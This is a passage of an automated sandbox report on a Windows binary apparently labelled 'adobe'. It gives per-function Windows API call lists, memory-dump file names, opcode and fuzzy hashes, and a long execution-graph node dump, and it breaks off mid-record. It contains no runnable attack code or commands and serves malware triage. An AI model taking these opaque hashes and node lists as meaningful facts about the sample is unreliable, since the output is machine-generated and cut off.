                                                                                                                                                          • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                                                          • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharMultiWide$AllocString
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 262959230-0
                                                                                                                                                          • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                          • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                                                          • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                                                                          • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401494 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014B2
                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014D7
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040C44C,?,?,?,00401800), ref: 004014FD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 3668210933-4052018393
                                                                                                                                                          • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                                                                                          • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                                                                                                                          • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                                                                                          • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: QueryValue
                                                                                                                                                          • String ID: )q@
                                                                                                                                                          • API String ID: 3660427363-2284170586
                                                                                                                                                          • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                          • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                                                                          • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                                                                          • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                                                                          • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CommandHandleLineModule
                                                                                                                                                          • String ID: U1hd.@
                                                                                                                                                          • API String ID: 2123368496-2904493091
                                                                                                                                                          • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                          • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                                                          • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                                                          • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                                                                          • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1458359878-0
                                                                                                                                                          • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                          • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                                                                          • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                                                                          • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:15.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:4.4%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:97
                                                                                                                                                          execution_graph 49872 40cf00 49873 40cf12 49872->49873 49874 40cf0d 49872->49874 49876 406f50 CloseHandle 49874->49876 49876->49873 53982 416420 53983 416432 53982->53983 53984 416472 GetClassInfoA 53983->53984 54002 408d34 33 API calls 53983->54002 53985 41649e 53984->53985 53986 4164f9 53985->53986 53987 4164c0 RegisterClassA 53985->53987 53988 4164b0 UnregisterClassA 53985->53988 53993 416516 53986->53993 53994 416527 53986->53994 53987->53986 53990 4164e8 53987->53990 53988->53987 53992 408cc4 19 API calls 53990->53992 53991 41646d 53991->53984 53992->53986 53993->53986 53995 408cc4 19 API calls 53993->53995 54003 40754c 53994->54003 53995->53994 53999 416540 54000 41a1f8 19 API calls 53999->54000 54001 41654a 54000->54001 54002->53991 54004 407550 54003->54004 54005 40755a 54003->54005 54006 402660 4 API calls 54004->54006 54007 418394 7 API calls 54005->54007 54006->54005 54007->53999 54008 47f122 54013 450674 54008->54013 54010 47f136 54023 47e248 54010->54023 54012 47f15a 54014 450681 54013->54014 54016 4506d5 54014->54016 54029 408c14 18 API calls 54014->54029 54017 4504f8 InterlockedExchange 54016->54017 54018 4506e7 54017->54018 54020 4506fd 54018->54020 54030 408c14 18 API calls 54018->54030 54021 450740 54020->54021 54031 408c14 18 API calls 54020->54031 54021->54010 54032 40b5c8 54023->54032 54025 47e2b5 54025->54012 54026 4069e4 18 API calls 54028 47e26a 54026->54028 54028->54025 54028->54026 54036 4755b0 54028->54036 54029->54016 54030->54020 54031->54021 54033 40b5d3 54032->54033 54034 40b5f3 54033->54034 54052 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54033->54052 54034->54028 54047 47562a 54036->54047 54051 4755e1 54036->54051 54037 475675 54053 450904 54037->54053 54038 450904 35 API calls 54038->54051 54040 450904 35 API calls 54040->54047 54041 47568c 54043 403420 4 API calls 54041->54043 54042 4038a4 18 API calls 54042->54051 54045 4756a6 54043->54045 54044 4038a4 18 API calls 54044->54047 54045->54028 54046 403450 18 API calls 54046->54051 54047->54037 54047->54040 54047->54044 54049 403744 18 API calls 54047->54049 54050 403450 18 API calls 54047->54050 54048 403744 18 API calls 54048->54051 54049->54047 54050->54047 54051->54038 54051->54042 54051->54046 54051->54047 54051->54048 54052->54034 54054 45091f 54053->54054 54058 450914 54053->54058 54059 4508a8 35 API calls 54054->54059 54056 45092a 54056->54058 54060 408c14 18 API calls 54056->54060 54058->54041 54059->54056 54060->54058 54061 41ee64 54062 41ee73 IsWindowVisible 54061->54062 54063 41eea9 54061->54063 54062->54063 54064 41ee7d IsWindowEnabled 54062->54064 54064->54063 54065 41ee87 54064->54065 54066 402648 18 API calls 54065->54066 54067 41ee91 EnableWindow 54066->54067 54067->54063 54068 41fb68 54069 41fb71 54068->54069 54072 41fe0c 54069->54072 54071 41fb7e 54073 41fefe 54072->54073 54074 41fe23 54072->54074 54073->54071 54074->54073 54093 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 54074->54093 54076 41fe59 54077 41fe83 54076->54077 54078 41fe5d 54076->54078 54103 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 54077->54103 54094 41fbac 54078->54094 54082 41fe91 54084 41fe95 54082->54084 54085 41febb 54082->54085 54083 41fbac 10 API calls 54088 41fe81 54083->54088 54086 41fbac 10 API calls 54084->54086 54087 41fbac 10 API calls 54085->54087 54089 41fea7 54086->54089 54090 41fecd 54087->54090 54088->54071 54091 41fbac 10 API calls 54089->54091 54092 41fbac 10 API calls 54090->54092 54091->54088 54092->54088 54093->54076 54095 41fbc7 54094->54095 54096 41fbdd 54095->54096 54097 41f94c 4 API calls 54095->54097 54104 41f94c 54096->54104 54097->54096 54099 41fc25 54100 41fc48 SetScrollInfo 54099->54100 54112 41faac 54100->54112 54103->54082 54105 4181f0 54104->54105 54106 41f969 GetWindowLongA 54105->54106 54107 41f9a6 54106->54107 54108 41f986 54106->54108 54124 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 54107->54124 54123 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 54108->54123 54111 41f992 54111->54099 54113 41faba 54112->54113 54114 41fac2 54112->54114 54113->54083 54115 41fb01 54114->54115 54116 41faf1 54114->54116 54121 41faff 54114->54121 54126 417e58 IsWindowVisible ScrollWindow SetWindowPos 54115->54126 54125 417e58 IsWindowVisible ScrollWindow SetWindowPos 54116->54125 54119 41fb41 GetScrollPos 54119->54113 54120 41fb4c 54119->54120 54122 41fb5b SetScrollPos 54120->54122 54121->54119 54122->54113 54123->54111 54124->54111 54125->54121 54126->54121 54127 4205a8 54128 4205bb 54127->54128 54148 415b40 54128->54148 54130 420702 54131 420719 54130->54131 54155 4146e4 KiUserCallbackDispatcher 54130->54155 54135 420730 54131->54135 54156 414728 KiUserCallbackDispatcher 54131->54156 54132 420661 54153 420858 34 API calls 54132->54153 54133 4205f6 54133->54130 54133->54132 54141 420652 MulDiv 54133->54141 54138 420752 54135->54138 54157 420070 12 API calls 54135->54157 54139 42067a 54139->54130 54154 420070 12 API calls 54139->54154 54152 41a314 19 API calls 54141->54152 54144 420697 54145 4206b3 MulDiv 54144->54145 54146 4206d6 54144->54146 54145->54146 54146->54130 54147 4206df MulDiv 54146->54147 54147->54130 54149 415b52 54148->54149 54158 414480 54149->54158 54151 415b6a 54151->54133 54152->54132 54153->54139 54154->54144 54155->54131 54156->54135 54157->54138 54159 41449a 54158->54159 54162 410658 54159->54162 54161 4144b0 54161->54151 54165 40dea4 54162->54165 54164 41065e 54164->54161 54166 40df06 54165->54166 54167 40deb7 54165->54167 54172 40df14 54166->54172 54170 40df14 33 API calls 54167->54170 54171 40dee1 54170->54171 54171->54164 54173 40df24 54172->54173 54175 40df3a 54173->54175 54184 40d7e0 54173->54184 54204 40e29c 19 API calls 54173->54204 54187 40e14c 54175->54187 54178 40d7e0 19 API calls 54179 40df42 54178->54179 54179->54178 54180 40dfae 54179->54180 54190 40dd60 54179->54190 54182 40e14c 19 API calls 54180->54182 54183 40df10 54182->54183 54183->54164 54205 40ec08 54184->54205 54213 40d6bc 54187->54213 54222 40e154 54190->54222 54195 40eb6c 19 API calls 54196 40dda9 54195->54196 54197 40ddc4 54196->54197 54198 40ddbb 54196->54198 54203 40ddc1 54196->54203 54238 40dbd8 54197->54238 54241 40dcc8 33 API calls 54198->54241 54201 403420 4 API calls 54202 40de8f 54201->54202 54202->54179 54203->54201 54204->54173 54208 40d980 54205->54208 54210 40d98b 54208->54210 54209 40d7ea 54209->54173 54210->54209 54212 40d9cc 19 API calls 54210->54212 54212->54210 54214 40ec08 19 API calls 54213->54214 54215 40d6c9 54214->54215 54216 40d6dc 54215->54216 54220 40ed0c 19 API calls 54215->54220 54216->54179 54218 40d6d7 54221 40d658 19 API calls 54218->54221 54220->54218 54221->54216 54242 40d964 54222->54242 54225 40dd93 54229 40eb6c 54225->54229 54226 40ec08 19 API calls 54227 40e178 54226->54227 54227->54225 54245 40e0d8 19 API calls 54227->54245 54230 40d980 19 API calls 54229->54230 54231 40eb81 54230->54231 54232 4034e0 18 API calls 54231->54232 54233 40eb8f 54232->54233 54234 403744 18 API calls 54233->54234 54235 40eb96 54234->54235 54236 40d980 19 API calls 54235->54236 54237 40dd9e 54236->54237 54237->54195 54246 40ad7c 33 API calls 54238->54246 54240 40dc00 54240->54203 54241->54203 54243 40ec08 19 API calls 54242->54243 54244 40d96e 54243->54244 54244->54225 54244->54226 54245->54225 54246->54240 54247 440be8 54248 440bf1 54247->54248 54249 440bff WriteFile 54247->54249 54248->54249 54250 440c0a 54249->54250 49877 41364c SetWindowLongA GetWindowLongA 49878 4136a9 SetPropA SetPropA 49877->49878 49879 41368b GetWindowLongA 49877->49879 49883 41f3ac 49878->49883 49879->49878 49880 41369a SetWindowLongA 49879->49880 49880->49878 49888 415280 49883->49888 49895 423c1c 49883->49895 49989 423a94 49883->49989 49884 4136f9 49889 41528d 49888->49889 49890 4152f3 49889->49890 49891 4152e8 49889->49891 49894 4152f1 49889->49894 49996 424b9c 13 API calls 49890->49996 49891->49894 49997 41506c 60 API calls 49891->49997 49894->49884 49900 423c52 49895->49900 49898 423cfc 49903 423d03 49898->49903 49904 423d37 49898->49904 49899 423c9d 49901 423ca3 49899->49901 49902 423d60 49899->49902 49938 423c73 49900->49938 49998 423b78 49900->49998 49907 423cd5 49901->49907 49908 423ca8 49901->49908 49911 423d72 49902->49911 49912 423d7b 49902->49912 49905 423fc1 49903->49905 49906 423d09 49903->49906 49909 423d42 49904->49909 49910 4240aa IsIconic 49904->49910 49905->49938 49963 423fe7 IsWindowEnabled 49905->49963 49913 423f23 SendMessageA 49906->49913 49937 423d17 49906->49937 49935 423cee 49907->49935 49936 423e4f 49907->49936 49907->49938 49915 423e06 49908->49915 49916 423cae 49908->49916 49917 4240e6 49909->49917 49918 423d4b 49909->49918 49914 4240be GetFocus 49910->49914 49910->49938 49919 423d88 49911->49919 49920 423d79 49911->49920 50007 4241a4 11 API calls 49912->50007 49913->49938 49923 4240cf 49914->49923 49914->49938 50020 423b94 NtdllDefWindowProc_A 49915->50020 49924 423cb7 49916->49924 49925 423e2e PostMessageA 49916->49925 50042 424860 WinHelpA PostMessageA 49917->50042 49928 4240fd 49918->49928 49939 423cd0 49918->49939 50008 4241ec IsIconic 49919->50008 50016 423b94 NtdllDefWindowProc_A 49920->50016 50041 41f004 GetCurrentThreadId 73A25940 49923->50041 49931 423cc0 49924->49931 49932 423eb5 49924->49932 50026 423b94 NtdllDefWindowProc_A 49925->50026 49933 424106 49928->49933 49934 42411b 49928->49934 49943 423cc9 49931->49943 49944 423dde IsIconic 49931->49944 49945 423ebe 49932->49945 49946 423eef 49932->49946 50043 4244e4 49933->50043 50049 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 49934->50049 49935->49939 49948 423e1b 49935->49948 50002 423b94 NtdllDefWindowProc_A 49936->50002 49937->49938 49937->49939 49968 423f66 49937->49968 49938->49884 49939->49938 50006 423b94 NtdllDefWindowProc_A 49939->50006 49942 4240d6 49942->49938 49952 4240de SetFocus 49942->49952 49943->49939 49953 423da1 49943->49953 49955 423dfa 49944->49955 49956 423dee 49944->49956 50028 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 49945->50028 50003 423b94 NtdllDefWindowProc_A 49946->50003 50021 424188 49948->50021 49950 423e49 49950->49938 49951 423e55 49960 423e93 49951->49960 49961 423e71 49951->49961 49952->49938 49953->49938 50017 422c5c ShowWindow PostMessageA PostQuitMessage 49953->50017 50019 423b94 NtdllDefWindowProc_A 49955->50019 50018 423bd0 29 API calls 49956->50018 49969 423a94 6 API calls 49960->49969 50027 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 49961->50027 49962 423ec6 49971 423ed8 49962->49971 50029 41ef68 49962->50029 49963->49938 49972 423ff5 49963->49972 49966 423ef5 49973 423f0d 49966->49973 50004 41eeb4 GetCurrentThreadId 73A25940 49966->50004 49968->49938 49975 423f88 IsWindowEnabled 49968->49975 49976 423e9b PostMessageA 49969->49976 50035 423b94 NtdllDefWindowProc_A 49971->50035 49982 423ffc IsWindowVisible 49972->49982 49980 423a94 6 API calls 49973->49980 49974 423e79 PostMessageA 49974->49938 49975->49938 49981 423f96 49975->49981 49976->49938 49980->49938 50036 412320 21 API calls 49981->50036 49982->49938 49984 42400a GetFocus 49982->49984 50037 4181f0 49984->50037 49986 42401f SetFocus 50039 415250 49986->50039 49990 423b1d 49989->49990 49991 423aa4 49989->49991 49990->49884 49991->49990 49992 423aaa EnumWindows 49991->49992 49992->49990 49993 423ac6 GetWindow GetWindowLongA 49992->49993 50207 423a2c GetWindow 49992->50207 49994 423ae5 49993->49994 49994->49990 49995 423b11 SetWindowPos 49994->49995 49995->49990 49995->49994 49996->49894 49997->49894 49999 423b82 49998->49999 50000 423b8d 49998->50000 49999->50000 50050 408728 GetSystemDefaultLCID 49999->50050 50000->49898 50000->49899 50002->49951 50003->49966 50005 41ef39 50004->50005 50005->49973 50006->49938 50007->49938 50009 4241fd SetActiveWindow 50008->50009 50014 424233 50008->50014 50179 42365c 50009->50179 50013 42421a 50013->50014 50015 42422d SetFocus 50013->50015 50014->49938 50015->50014 50016->49938 50017->49938 50018->49938 50019->49938 50020->49938 50192 41db40 50021->50192 50024 4241a0 50024->49938 50025 424194 LoadIconA 50025->50024 50026->49950 50027->49974 50028->49962 50030 41ef70 IsWindow 50029->50030 50031 41ef9c 50029->50031 50032 41ef8a 50030->50032 50033 41ef7f EnableWindow 50030->50033 50031->49971 50032->50030 50032->50031 50034 402660 4 API calls 50032->50034 50033->50032 50034->50032 50035->49938 50036->49938 50038 4181fa 50037->50038 50038->49986 50040 41526b SetFocus 50039->50040 50040->49938 50041->49942 50042->49950 50044 4244f0 50043->50044 50046 42450a 50043->50046 50045 4244f7 SendMessageA 50044->50045 50048 42451f 50044->50048 50045->50048 50047 402648 18 API calls 50046->50047 50047->50048 50048->49938 50049->49950 50105 408570 GetLocaleInfoA 50050->50105 50055 408570 19 API calls 50056 40877d 50055->50056 50057 408570 19 API calls 50056->50057 50058 4087a1 50057->50058 50117 4085bc GetLocaleInfoA 50058->50117 50061 4085bc GetLocaleInfoA 50062 4087d1 50061->50062 50063 408570 19 API calls 50062->50063 50064 4087eb 50063->50064 50065 4085bc GetLocaleInfoA 50064->50065 50066 408808 50065->50066 50067 408570 19 API calls 50066->50067 50068 408822 50067->50068 50069 403450 18 API calls 50068->50069 50070 40882f 50069->50070 50071 408570 19 API calls 50070->50071 50072 408844 50071->50072 50073 403450 18 API calls 50072->50073 50074 408851 50073->50074 50075 4085bc GetLocaleInfoA 50074->50075 50076 40885f 50075->50076 50077 408570 19 API calls 50076->50077 50078 408879 50077->50078 50079 403450 18 API calls 50078->50079 50080 408886 50079->50080 50081 408570 19 API calls 50080->50081 50082 40889b 50081->50082 50083 403450 18 API calls 50082->50083 50084 4088a8 50083->50084 50085 408570 19 API calls 50084->50085 50106 408597 50105->50106 50107 4085a9 50105->50107 50133 4034e0 50106->50133 50109 403494 4 API calls 50107->50109 50110 4085a7 50109->50110 50111 403450 50110->50111 50112 403454 50111->50112 50114 403464 50111->50114 50112->50114 50115 4034bc 18 API calls 50112->50115 50113 403490 50113->50055 50114->50113 50174 402660 50114->50174 50115->50114 50118 4085d8 50117->50118 50118->50061 50138 4034bc 50133->50138 50135 4034f0 50136 403400 4 API calls 50135->50136 50137 403508 50136->50137 50137->50110 50139 4034c0 50138->50139 50140 4034dc 50138->50140 50143 402648 50139->50143 50140->50135 50142 4034c9 50142->50135 50144 40264c 50143->50144 50146 402656 50143->50146 50149 402088 50144->50149 50145 402652 50145->50146 50160 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50145->50160 50146->50142 50146->50146 50150 40209c 50149->50150 50151 4020a1 50149->50151 50161 4019cc RtlInitializeCriticalSection 50150->50161 50152 4020c6 RtlEnterCriticalSection 50151->50152 50154 4020d0 50151->50154 50157 4020a5 50151->50157 50152->50154 50154->50157 50168 401f94 50154->50168 50157->50145 50158 4021f1 RtlLeaveCriticalSection 50159 4021fb 50158->50159 50159->50145 50160->50146 50162 4019f0 RtlEnterCriticalSection 50161->50162 50163 4019fa 50161->50163 50162->50163 50164 401a18 LocalAlloc 50163->50164 50165 401a32 50164->50165 50166 401a81 50165->50166 50167 401a77 RtlLeaveCriticalSection 50165->50167 50166->50151 50167->50166 50171 401fa4 50168->50171 50169 401fd0 50170 401db4 9 API calls 50169->50170 50173 401ff4 50169->50173 50170->50173 50171->50169 50172 401f0c 12 API calls 50171->50172 50171->50173 50172->50171 50173->50158 50173->50159 50175 402664 50174->50175 50176 40266e 50174->50176 50175->50176 50178 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50175->50178 50176->50113 50176->50176 50178->50176 50188 423608 SystemParametersInfoA 50179->50188 50182 423675 ShowWindow 50184 423680 50182->50184 50185 423687 50182->50185 50191 423638 SystemParametersInfoA 50184->50191 50187 423b24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 50185->50187 50187->50013 50189 423626 50188->50189 50189->50182 50190 423638 SystemParametersInfoA 50189->50190 50190->50182 50191->50185 50195 41db64 50192->50195 50196 41db4a 50195->50196 50197 41db71 50195->50197 50196->50024 50196->50025 50197->50196 50204 40cc80 19 API calls 50197->50204 50199 41db8e 50199->50196 50200 41dba8 50199->50200 50201 41db9b 50199->50201 50205 41bd9c 25 API calls 50200->50205 50206 41b398 19 API calls 50201->50206 50204->50199 50205->50196 50206->50196 50208 423a4d GetWindowLongA 50207->50208 50209 423a59 50207->50209 50208->50209 50210 4900d8 50211 490112 50210->50211 50212 49011e 50211->50212 50213 490114 50211->50213 50215 49012d 50212->50215 50216 490156 50212->50216 50409 4090a0 MessageBeep 50213->50409 50217 44684c 32 API calls 50215->50217 50223 49018e 50216->50223 50224 490165 50216->50224 50219 49013a 50217->50219 50410 406bb8 50219->50410 50221 403400 4 API calls 50225 490772 50221->50225 50230 49019d 50223->50230 50231 4901c6 50223->50231 50227 44684c 32 API calls 50224->50227 50229 490172 50227->50229 50418 406c08 18 API calls 50229->50418 50233 44684c 32 API calls 50230->50233 50238 4901ee 50231->50238 50239 4901d5 50231->50239 50235 4901aa 50233->50235 50234 49017d 50419 446ba0 19 API calls 50234->50419 50420 406c3c 18 API calls 50235->50420 50245 4901fd 50238->50245 50246 490222 50238->50246 50422 407288 19 API calls 50239->50422 50240 4901b5 50421 446ba0 19 API calls 50240->50421 50243 4901dd 50423 446ba0 19 API calls 50243->50423 50247 44684c 32 API calls 50245->50247 50250 49025a 50246->50250 50251 490231 50246->50251 50248 49020a 50247->50248 50424 4072b0 50248->50424 50257 490269 50250->50257 50258 490292 50250->50258 50252 44684c 32 API calls 50251->50252 50254 49023e 50252->50254 50253 490212 50427 446924 19 API calls 50253->50427 50428 42c7d0 50254->50428 50260 44684c 32 API calls 50257->50260 50263 4902de 50258->50263 50264 4902a1 50258->50264 50262 490276 50260->50262 50438 407200 22 API calls 50262->50438 50271 4902ed 50263->50271 50272 490316 50263->50272 50266 44684c 32 API calls 50264->50266 50268 4902b0 50266->50268 50267 490281 50439 446ba0 19 API calls 50267->50439 50270 44684c 32 API calls 50268->50270 50274 4902c1 50270->50274 50273 44684c 32 API calls 50271->50273 50279 49034e 50272->50279 50280 490325 50272->50280 50275 4902fa 50273->50275 50440 48fddc 22 API calls 50274->50440 50442 42c870 50275->50442 50278 4902cd 50441 446ba0 19 API calls 50278->50441 50286 49035d 50279->50286 50289 490386 50279->50289 50283 44684c 32 API calls 50280->50283 50285 490332 50283->50285 50448 42c898 50285->50448 50288 44684c 32 API calls 50286->50288 50291 49036a 50288->50291 50294 4903be 50289->50294 50295 490395 50289->50295 50457 42c8c8 19 API calls 50291->50457 50302 4903cd 50294->50302 50303 4903f6 50294->50303 50298 44684c 32 API calls 50295->50298 50296 490119 50510 403420 50296->50510 50297 490375 50458 446ba0 19 API calls 50297->50458 50300 4903a2 50298->50300 50459 42c8f8 50300->50459 50305 44684c 32 API calls 50302->50305 50308 490442 50303->50308 50309 490405 50303->50309 50307 4903da 50305->50307 50465 42c920 50307->50465 50316 490451 50308->50316 50317 490494 50308->50317 50311 44684c 32 API calls 50309->50311 50313 490414 50311->50313 50315 44684c 32 API calls 50313->50315 50318 490425 50315->50318 50319 44684c 32 API calls 50316->50319 50324 4904a3 50317->50324 50325 